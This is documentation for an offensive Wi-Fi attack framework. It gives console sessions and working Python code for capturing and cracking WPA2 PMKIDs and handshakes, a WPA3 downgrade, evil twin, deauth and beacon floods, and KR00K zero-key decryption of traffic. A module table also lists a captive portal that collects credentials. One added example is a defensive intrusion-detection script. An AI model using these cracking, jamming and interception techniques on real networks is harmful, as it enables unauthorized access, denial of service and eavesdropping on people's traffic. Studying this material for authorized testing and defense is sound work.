# Wi-Fi Attacks

Complete reference for the WPA2, WPA3, WPE/EAPOL and 802.11 attack modules under `wifi_lab`.
| Module | Description |
|---|---|
| wifi_lab/fragattacks | FragAttacks (CVE-2020-26140+) - see FragAttacks |
| wifi_lab/handshake_snooper | PMKID-first + deauth handshake capture pipeline |
| wifi_lab/wpa3_attack_suite | Dragonblood SAE flood, CSA+harvest, Double SSID, downgrade |
| wifi_lab/auth_flood | Auth/EAPOL flood, amok mode, mesh flood (mdk4 backend) |
| wifi_lab/beacon_flood | Beacon spam with custom SSIDs |
| wifi_lab/evil_twin_workflow | Full evil-twin with verify-on-capture |
| wifi_lab/captive_portal_modern_lab | Modern captive portal with HTML/JS credential collector |
| wifi_lab/mitm_wifi_bridge | ARP/DNS spoofing + Ghost combo (bettercap) |
| wifi_lab/adaptive_harvest | Score-driven channel/PMKID adaptive harvesting |
| wifi_lab/wardriving_deauth_loop | Automated wardriving scan/deauth/capture cycles |
| wifi_lab/wireless_ids | Lightweight IDS: BSSID baseline + rogue AP detection |
| wifi_lab/awdl_attack | AWDL/AirDrop (opendrop + owl) - discover, send, DoS |
| wifi_lab/momo_integrated_attack | KARMA + PMKID-first + downgrade orchestration |
| wifi_lab/research_ecosystem_status | Status of all research submodule integrations |
| wifi_lab/gps_wardriving_ndjson | GPS NMEA -> NDJSON wardriving log |
| wifi_lab/wifi_sniffer | Multi-backend sniffer (tcpdump/scapy/tshark) |
| wifi_lab/wifi_kr00k_cve_2019_15126 | CVE-2019-15126 KR00K: deauth + CCMP zero-TK decryption |
## WPA2 handshake capture (handshake_snooper)

The module tries the clientless PMKID route first: the AP places a PMKID in the RSN IE of EAPOL message 1, so a single association attempt from the attacker's own card is enough and no legitimate client has to be present.

```
wxf > use generic/wifi_lab/handshake_snooper
wxf (HandshakeSnooper) > set INTERFACE wlan0mon
wxf (HandshakeSnooper) > set TARGET_BSSID AA:BB:CC:DD:EE:FF
wxf (HandshakeSnooper) > run
[*] Starting handshake capture on wlan0mon
[*] Target: AA:BB:CC:DD:EE:FF (HomeWifi) ch6 WPA2-PSK
[*] Attempting PMKID capture (clientless)...
[+] PMKID captured: 4d4f4e4f3a3a3a3aaabbccddeeff...
[*] Saving to /tmp/capture_AABBCCDDEEFF.pcap
[+] Capture complete. Crack with: hashcat -m 22000 capture.hc22000 rockyou.txt
```

Note that the file written is a `.pcap`; hashcat mode 22000 reads the hc22000 text format, so convert first with `hcxpcapngtool -o capture.hc22000 /tmp/capture_AABBCCDDEEFF.pcap` (hcxtools) before running the hashcat command shown.
If the AP does not return a PMKID (many APs simply omit it), the module falls back to a deauth-triggered capture of the 4-way handshake, which needs at least one connected client to kick off and watch while it reconnects:

```
[*] PMKID not available - attempting deauth + EAPOL capture
[*] Sending 5 deauth frames to force client reconnect...
[*] Monitoring for EAPOL 4-way handshake...
[+] Handshake captured (4-way EAPOL, all 4 messages)
[+] CCMP/TKIP: check with aircrack-ng or hashcat -m 22000
```
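To show what the PMKID route actually recovers, and what hashcat does with the exported line, here is an added example (not wxf project code) that derives a PMKID from a passphrase, writes and parses the hc22000 PMKID line format, and runs a wordlist against it. The SSID, MAC addresses, passphrase and wordlist are constructed for the demo; the derivation itself (PBKDF2-HMAC-SHA1 for the PMK, HMAC-SHA1-128 over "PMK Name" || AP MAC || STA MAC for the PMKID) is the WPA2 standard's.

```python
"""PMKID derivation and offline recovery (what hashcat -m 22000 does with the line
the module exports). Added example, not wxf project code. The SSID, MAC addresses,
passphrase and wordlist below are constructed for the demo."""
import hashlib
import hmac
from typing import Iterable, Optional, Tuple


def wpa2_pmk(passphrase: str, ssid: str) -> bytes:
    # WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    # This is the expensive step; cracking speed is bound by PBKDF2, not by the HMAC.
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def pmkid(pmk: bytes, ap_mac: bytes, sta_mac: bytes) -> bytes:
    # PMKID = HMAC-SHA1-128(PMK, "PMK Name" || AA || SPA): first 16 bytes of HMAC-SHA1.
    # The AP puts this in the RSN IE of EAPOL message 1, so no client needs to be present.
    return hmac.new(pmk, b"PMK Name" + ap_mac + sta_mac, hashlib.sha1).digest()[:16]


def to_hc22000(pmkid_bytes: bytes, ap_mac: bytes, sta_mac: bytes, ssid: str) -> str:
    # hashcat 22000 PMKID line: WPA*01*PMKID*MAC_AP*MAC_STA*ESSID_HEX*** (last 3 fields empty)
    return "WPA*01*%s*%s*%s*%s***" % (pmkid_bytes.hex(), ap_mac.hex(), sta_mac.hex(),
                                      ssid.encode().hex())


def parse_hc22000(line: str) -> Tuple[bytes, bytes, bytes, str]:
    f = line.strip().split("*")
    if len(f) != 9 or f[0] != "WPA" or f[1] != "01":
        raise ValueError("not a WPA*01 (PMKID) line")
    return bytes.fromhex(f[2]), bytes.fromhex(f[3]), bytes.fromhex(f[4]), bytes.fromhex(f[5]).decode()


def crack_pmkid(line: str, candidates: Iterable[str]) -> Optional[str]:
    # Recompute the PMKID for each candidate passphrase and compare in constant time.
    target, ap_mac, sta_mac, ssid = parse_hc22000(line)
    for pw in candidates:
        if not 8 <= len(pw) <= 63:      # WPA2 passphrases are 8..63 ASCII characters
            continue
        if hmac.compare_digest(pmkid(wpa2_pmk(pw, ssid), ap_mac, sta_mac), target):
            return pw
    return None


# Constructed sample: the AP/STA addresses from the session above and a made-up passphrase.
AP_MAC = bytes.fromhex("aabbccddeeff")
STA_MAC = bytes.fromhex("112233445566")
SSID = "HomeWifi"
SAMPLE_LINE = to_hc22000(pmkid(wpa2_pmk("correct-horse-1", SSID), AP_MAC, STA_MAC),
                         AP_MAC, STA_MAC, SSID)
WORDLIST = ["short", "password", "letmein123", "correct-horse-1"]   # constructed wordlist

if __name__ == "__main__":
    print(SAMPLE_LINE)
    print("recovered:", crack_pmkid(SAMPLE_LINE, WORDLIST))
```

Two things worth noticing: the SSID is part of the PBKDF2 salt, so a line with the wrong ESSID field never matches even with the right passphrase (a common cause of "uncrackable" captures is a mangled or hidden SSID); and the STA MAC in the line is the attacker's own card for a clientless PMKID capture, which is why the method works without any victim client.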
## WPA3 and Dragonblood (wpa3_attack_suite)

WPA3-Personal replaces the PSK-based 4-way key derivation with SAE (Simultaneous Authentication of Equals, a Dragonfly handshake), so there is no offline-crackable handshake or PMKID to capture. The Dragonblood research (Vanhoef and Ronen, 2019) showed two ways around that: side-channel and password-partitioning attacks against SAE implementations, and a downgrade attack against networks running WPA3 in transition mode (WPA3 and WPA2 on the same SSID), where a rogue AP advertising only WPA2 makes the client start a WPA2 handshake whose first two messages are enough for offline cracking. The CVE the module prints for the downgrade vector, CVE-2019-13377, actually tracks the Brainpool-curve timing side channel in hostapd/wpa_supplicant's SAE code rather than the downgrade itself; the downgrade is mitigated on clients that remember a network as WPA3 and refuse to use WPA2 for it.
```
wxf > use generic/wifi_lab/wpa3_attack_suite
wxf (WPA3AttackSuite) > show options
Options:
  INTERFACE     wlan0mon    Monitor mode interface
  TARGET_BSSID  (required)  Target AP BSSID
  ATTACK_TYPE   all         Attack vector (sae_flood, downgrade, double_ssid, csa_harvest)
  SIMULATE      true        Dry-run
wxf (WPA3AttackSuite) > set INTERFACE wlan0mon
wxf (WPA3AttackSuite) > set TARGET_BSSID AA:BB:CC:DD:EE:FF
wxf (WPA3AttackSuite) > set ATTACK_TYPE downgrade
wxf (WPA3AttackSuite) > set SIMULATE true
wxf (WPA3AttackSuite) > run
[SIMULATE] WPA3 Downgrade Attack (CVE-2019-13377)
[SIMULATE] Target: AA:BB:CC:DD:EE:FF
[SIMULATE] Creating rogue AP: same SSID (HomeWifi), WPA2-only capability advertisement
[SIMULATE] Sending Channel Switch Announcement (CSA) to move clients to rogue AP
[SIMULATE] Once clients associate to rogue AP, capture WPA2 handshake for cracking
[!] Set SIMULATE=false to run
[!] Requires: wlan0 (managed) + wlan0mon (monitor) + hostapd/dnsmasq
```
## Evil twin (evil_twin_workflow)

```
wxf > use generic/wifi_lab/evil_twin_workflow
wxf (EvilTwin) > set INTERFACE wlan0mon
wxf (EvilTwin) > set TARGET_BSSID AA:BB:CC:DD:EE:FF
wxf (EvilTwin) > set TARGET_ESSID HomeWifi
wxf (EvilTwin) > set CHANNEL 6
wxf (EvilTwin) > set SIMULATE true
wxf (EvilTwin) > run
[SIMULATE] Evil Twin Workflow
[SIMULATE] Phase 1: Deauth all clients from AA:BB:CC:DD:EE:FF (HomeWifi) ch6
[SIMULATE] Phase 2: Start rogue AP: SSID=HomeWifi, channel=6, OPEN (captive)
[SIMULATE] Phase 3: DHCP + DNS server on rogue AP
[SIMULATE] Phase 4: Monitor for client associations
[SIMULATE] Phase 5: Capture WPA2 handshake when client retries real AP
[SIMULATE] - Verify captured handshake against captured clients
[SIMULATE] - Export for aircrack-ng / hashcat
[!] Set SIMULATE=false
[!] PREREQ: hostapd + dnsmasq installed
```
## Deauth and auth flood (auth_flood)

```
wxf > use generic/wifi_lab/auth_flood
wxf (AuthFlood) > set INTERFACE wlan0mon
wxf (AuthFlood) > set TARGET_BSSID AA:BB:CC:DD:EE:FF
wxf (AuthFlood) > set MODE deauth
wxf (AuthFlood) > set SIMULATE true
wxf (AuthFlood) > run
[SIMULATE] Deauth flood against AA:BB:CC:DD:EE:FF
[SIMULATE] Frames: 100/s, broadcast client (FF:FF:FF:FF:FF:FF), reason 0x07
[!] Set SIMULATE=false to run
[!] PREREQ: wlan0mon in monitor mode on same channel as target
```
## Beacon flood (beacon_flood)

```
wxf > use generic/wifi_lab/beacon_flood
wxf (BeaconFlood) > set INTERFACE wlan0mon
wxf (BeaconFlood) > set SSID_COUNT 500
wxf (BeaconFlood) > set CHANNEL 6
wxf (BeaconFlood) > set SIMULATE true
wxf (BeaconFlood) > run
[SIMULATE] Beacon flood: 500 unique SSIDs on channel 6
[SIMULATE] Rotates SSIDs and MACs to avoid deduplication
[SIMULATE] Approx rate: 50 beacons/s
[!] Set SIMULATE=false (uses mdk4 backend)
[!] PREREQ: mdk4 installed
```
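The four attacks above (WPA3 downgrade via a WPA2-only twin, open evil twin, broadcast deauth flood, beacon flood) all leave a footprint in management frames that a baseline-driven monitor can catch. The following is an added example of such detection logic, written for this page and not the code of the `wireless_ids` module: it keeps a baseline of legitimate BSSIDs and the strongest AKM per SSID, then flags unknown BSSIDs announcing a known SSID, any beacon advertising weaker security than the baseline, bursts of broadcast deauths from a known BSSID, and bursts of never-seen BSSIDs. The frames are constructed dicts standing in for parsed beacons and deauths, and the thresholds are assumptions to tune per site.

```python
"""Baseline-driven wireless IDS rules for rogue/evil-twin APs, WPA3->WPA2 downgrade,
deauth floods and beacon floods. Added example, not the wxf wireless_ids module.
Frames are constructed dicts standing in for parsed 802.11 management frames."""
from collections import deque
from typing import Dict, List

DEAUTH_PER_SEC = 20      # assumed threshold (frames/s); the auth_flood module sends ~100/s
NEW_BSSID_PER_SEC = 30   # assumed threshold (new BSSIDs/s); beacon_flood does ~50 beacons/s
WINDOW = 1.0             # sliding window in seconds

SEC_RANK = {"OPEN": 0, "PSK": 1, "SAE": 2}   # higher is stronger; used to spot downgrades


class WirelessIDS:
    def __init__(self, baseline: Dict[str, dict]):
        # baseline: ssid -> {"bssids": set of legitimate BSSIDs, "akm": "OPEN"|"PSK"|"SAE"}
        self.baseline = baseline
        self.known_bssids = {b for v in baseline.values() for b in v["bssids"]}
        self.deauth_ts: deque = deque()
        self.new_bssid_ts: deque = deque()

    def _burst(self, window: deque, ts: float, limit: int) -> bool:
        # Count events inside the sliding window; fire once per burst, then reset.
        window.append(ts)
        while window and ts - window[0] > WINDOW:
            window.popleft()
        if len(window) > limit:
            window.clear()
            return True
        return False

    def process(self, f: dict) -> List[str]:
        alerts: List[str] = []
        if f["type"] == "beacon":
            base = self.baseline.get(f["ssid"])
            if base is not None:
                if f["bssid"] not in base["bssids"]:
                    alerts.append(f"ROGUE_AP ssid={f['ssid']} bssid={f['bssid']} ch={f['channel']}")
                if SEC_RANK[f["akm"]] < SEC_RANK[base["akm"]]:
                    # Catches both the WPA2-only twin (downgrade) and the OPEN evil twin,
                    # even when the rogue spoofs the legitimate BSSID.
                    alerts.append(f"DOWNGRADE ssid={f['ssid']} bssid={f['bssid']} "
                                  f"akm={f['akm']} baseline={base['akm']}")
            if f["bssid"] not in self.known_bssids:
                self.known_bssids.add(f["bssid"])
                if self._burst(self.new_bssid_ts, f["ts"], NEW_BSSID_PER_SEC):
                    alerts.append(f"BEACON_FLOOD >{NEW_BSSID_PER_SEC} new BSSIDs in {WINDOW}s ch={f['channel']}")
        elif f["type"] == "deauth":
            # Broadcast deauth "from" one of our APs is the aireplay/mdk4 pattern.
            if f["bssid"] in self.known_bssids and f["dst"] == "ff:ff:ff:ff:ff:ff":
                if self._burst(self.deauth_ts, f["ts"], DEAUTH_PER_SEC):
                    alerts.append(f"DEAUTH_FLOOD bssid={f['bssid']} reason={f['reason']}")
        return alerts

    def run(self, frames) -> List[str]:
        out: List[str] = []
        for f in sorted(frames, key=lambda x: x["ts"]):
            out += self.process(f)
        return out


BASELINE = {"HomeWifi": {"bssids": {"aa:bb:cc:dd:ee:ff"}, "akm": "SAE"}}   # constructed baseline


def constructed_capture() -> List[dict]:
    # Constructed trace: legit beacon, WPA2-only twin, 25 broadcast deauths, 40 spam beacons.
    ap, rogue = "aa:bb:cc:dd:ee:ff", "02:11:22:33:44:55"
    frames = [
        {"ts": 0.0, "type": "beacon", "ssid": "HomeWifi", "bssid": ap, "channel": 6, "akm": "SAE"},
        {"ts": 0.5, "type": "beacon", "ssid": "HomeWifi", "bssid": rogue, "channel": 6, "akm": "PSK"},
    ]
    frames += [{"ts": 1.0 + i * 0.01, "type": "deauth", "bssid": ap,
                "dst": "ff:ff:ff:ff:ff:ff", "reason": 7} for i in range(25)]
    frames += [{"ts": 2.0 + i * 0.01, "type": "beacon", "ssid": f"spam{i}", "channel": 6,
                "bssid": f"02:00:00:00:00:{i:02x}", "akm": "OPEN"} for i in range(40)]
    return frames


if __name__ == "__main__":
    for a in WirelessIDS(BASELINE).run(constructed_capture()):
        print(a)
```

A rogue that clones the legitimate BSSID defeats the ROGUE_AP rule but still trips DOWNGRADE as long as the baseline records the strongest AKM seen; a channel mismatch against the baseline is a useful third signal for the CSA variant and is a one-line addition to `process`.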
## KR00K (wifi_kr00k_cve_2019_15126)

KR00K (CVE-2019-15126) affects certain Broadcom and Cypress Wi-Fi chips. When the client is disassociated, for example by a spoofed deauthentication frame, the chip clears its session TK (Temporal Key) to all zeros but still flushes whatever data frames remain in its transmit buffer, encrypting them with that zeroed key. An observer in range can decrypt exactly those frames with a 16-byte zero key, without the WPA2 passphrase; the exposure is limited to the frames buffered at the moment of disassociation, but the deauth can be repeated to harvest more.
```
wxf > use generic/wifi_lab/wifi_kr00k_cve_2019_15126
wxf (KR00K) > show info
Name: KR00K Unauthenticated CCMP Decryption
CVE: CVE-2019-15126
CVSS: 6.5 (Medium)
Target: Devices with Broadcom BCM4375, BCM4389 or Cypress CYW43xx chips
        (includes many iPhones, MacBooks, Kindles, Raspberry Pi, many routers)
Auth: None required (attacker just needs to be in WiFi range)
Description:
  After receiving a deauth frame, the affected chip clears the TK to all zeros
  but continues to transmit buffered frames using the zeroed key.
  These frames can be trivially decrypted by an observer.
  Exposes partial network traffic including DNS queries, HTTP requests, etc.
wxf (KR00K) > set INTERFACE wlan0mon
wxf (KR00K) > set TARGET_BSSID AA:BB:CC:DD:EE:FF
wxf (KR00K) > set TARGET_STA 11:22:33:44:55:66
wxf (KR00K) > set SIMULATE true
wxf (KR00K) > run
[SIMULATE] CVE-2019-15126 KR00K
[SIMULATE] Step 1: Send deauth to 11:22:33:44:55:66 from AA:BB:CC:DD:EE:FF
[SIMULATE] Step 2: Capture frames transmitted immediately after deauth
[SIMULATE] Expected: buffered frames encrypted with TK=00:00:00:00:...
[SIMULATE] Step 3: Decrypt captured frames with all-zeros CCMP key
[SIMULATE] Potential exposure: last 5-15 seconds of buffered traffic
[!] Set SIMULATE=false to run
[!] PREREQ: wlan0mon on target channel
[!] NOTE: Affects many common devices from 2016-2019, patched in 2020
```
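Step 3 is the part worth seeing in code: CCMP is AES-CCM with an 8-byte MIC, a 13-byte nonce built from the transmitter address and the packet number in the CCMP header, and an AAD built from the masked 802.11 header, so "decrypt with a zero TK" is a well-defined check that either passes the MIC or does not. The added example below (written for this page, not the module's code) plays the vulnerable STA to produce one frame under its real key and one under the zeroed key after the deauth, then runs the observer-side check on both and confirms a hit by the LLC/SNAP prefix of the plaintext. The frames, addresses and payload are constructed; it needs the `cryptography` package and handles non-QoS data frames without an A4 address.

```python
"""KR00K (CVE-2019-15126) zero-TK decryption check.

Added example (not the wxf module's code): a vulnerable chip keeps transmitting its
TX buffer after a disassociation but with the TK already cleared to all zeros, so the
observer can decrypt those CCMP frames with a 16-byte zero key. The two frames used here
are constructed in this file (we play the STA to produce them); only the 'cryptography'
package is needed, no capture hardware. Non-QoS data frames without A4 only.
"""
import struct
from typing import Optional, Tuple

from cryptography.exceptions import InvalidTag
from cryptography.hazmat.primitives.ciphers.aead import AESCCM

ZERO_TK = bytes(16)
LLC_SNAP = bytes.fromhex("aaaa03000000")   # first 6 plaintext bytes of an 802.11 data MSDU
HDR_LEN, CCMP_HDR_LEN, MIC_LEN = 24, 8, 8  # 3-address header, CCMP header, CCMP MIC


def ccmp_header(pn: int, key_id: int = 0) -> bytes:
    # PN0 PN1 rsvd ExtIV|KeyID PN2 PN3 PN4 PN5 (PN0 is the least significant byte)
    b = pn.to_bytes(6, "little")
    return bytes([b[0], b[1], 0, 0x20 | (key_id << 6), b[2], b[3], b[4], b[5]])


def parse_pn(ccmp_hdr: bytes) -> int:
    h = ccmp_hdr
    return int.from_bytes(bytes([h[0], h[1], h[4], h[5], h[6], h[7]]), "little")


def ccmp_nonce(hdr: bytes, pn: int) -> bytes:
    # nonce = priority (0 for non-QoS) || A2 = transmitter address || PN big-endian
    return b"\x00" + hdr[10:16] + pn.to_bytes(6, "big")


def ccmp_aad(hdr: bytes) -> bytes:
    # CCMP AAD: FC with Subtype(b4-b6)/Retry/PwrMgt/MoreData/Order masked and Protected
    # forced on, then A1 A2 A3, then Sequence Control with the sequence number zeroed.
    fc = (struct.unpack("<H", hdr[0:2])[0] & ~0xB870) | 0x4000
    sc = struct.unpack("<H", hdr[22:24])[0] & 0x000F
    return struct.pack("<H", fc) + hdr[4:22] + struct.pack("<H", sc)


def ccmp_encrypt(tk: bytes, hdr: bytes, pn: int, msdu: bytes) -> bytes:
    # What the STA puts on the air: header || CCMP header || ciphertext || 8-byte MIC
    ct = AESCCM(tk, tag_length=MIC_LEN).encrypt(ccmp_nonce(hdr, pn), msdu, ccmp_aad(hdr))
    return hdr + ccmp_header(pn) + ct


def kr00k_decrypt(frame: bytes) -> Optional[bytes]:
    # Observer side: try the all-zeros TK. A valid MIC plus an LLC/SNAP prefix is a hit;
    # frames encrypted under the real TK fail the MIC and return None.
    hdr, ccmp_hdr = frame[:HDR_LEN], frame[HDR_LEN:HDR_LEN + CCMP_HDR_LEN]
    body = frame[HDR_LEN + CCMP_HDR_LEN:]
    try:
        pt = AESCCM(ZERO_TK, tag_length=MIC_LEN).decrypt(
            ccmp_nonce(hdr, parse_pn(ccmp_hdr)), body, ccmp_aad(hdr))
    except InvalidTag:
        return None
    return pt if pt.startswith(LLC_SNAP) else None


def data_header(sta: bytes, bssid: bytes, dst: bytes, seq: int) -> bytes:
    # Data frame, ToDS=1, Protected=1: A1=BSSID, A2=STA (transmitter), A3=destination
    fc = 0x0008 | 0x0100 | 0x4000
    return struct.pack("<H", fc) + b"\x00\x00" + bssid + sta + dst + struct.pack("<H", seq << 4)


def constructed_capture() -> Tuple[bytes, bytes]:
    # Constructed scenario: the same STA sends one frame before and one after the deauth.
    sta, bssid = bytes.fromhex("112233445566"), bytes.fromhex("aabbccddeeff")
    real_tk = bytes(range(16))                       # the STA's real session key (made up)
    msdu = LLC_SNAP + b"\x08\x00" + b"constructed DNS query for example.com"
    before = ccmp_encrypt(real_tk, data_header(sta, bssid, bssid, 10), 1000, msdu)
    # deauth arrives: firmware zeroes the TK but still flushes the buffered frame
    after = ccmp_encrypt(ZERO_TK, data_header(sta, bssid, bssid, 11), 1001, msdu)
    return before, after


if __name__ == "__main__":
    before, after = constructed_capture()
    print("before deauth:", kr00k_decrypt(before))
    print("after deauth: ", kr00k_decrypt(after))
```

In a real capture the same check is applied to every CCMP data frame from the target STA in the seconds after the deauth; the PN in the CCMP header keeps increasing across the key reset, which is why the nonce must be taken from the frame rather than guessed, and a MIC failure simply means that frame was not sent under the zeroed key.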
## Extracting handshakes from existing captures (pcap_handshake_extractor)

```
wxf > use generic/pcap/pcap_handshake_extractor
wxf (PCAPHandshakeExtractor) > set PCAP_FILE /captures/office.pcap
wxf (PCAPHandshakeExtractor) > run
[*] Analyzing /captures/office.pcap...
[+] Handshake found: AA:BB:CC:DD:EE:FF (HomeWifi) - 4-way EAPOL complete
[+] Handshake found: 11:22:33:44:55:66 (GuestNet) - partial (msg1,2 only)
[+] PMKID found: FF:EE:DD:CC:BB:AA (OfficeWifi)
[*] Exported: /captures/office_handshakes.hc22000
[*] Crack: hashcat -m 22000 /captures/office_handshakes.hc22000 rockyou.txt
```

A partial handshake with only messages 1 and 2 is still crackable: message 2 carries the client's SNonce and a MIC over the EAPOL frame, which together with the ANonce from message 1 is all hashcat needs.
Related pages: FragAttacks | KRACK | Bluetooth & BLE
Author: Andre Henrique (@mrhenrike) | Uniao Geek